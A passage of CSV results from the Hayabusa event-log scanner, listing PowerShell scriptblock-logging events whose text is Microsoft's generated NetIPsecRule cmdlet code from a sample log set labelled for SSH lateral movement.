$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_quer",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"{Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] 
[ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) 
$__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_quer",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"yBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 
'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = 
$PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecRule' -Alias '*' function Copy-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] 
[Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, 
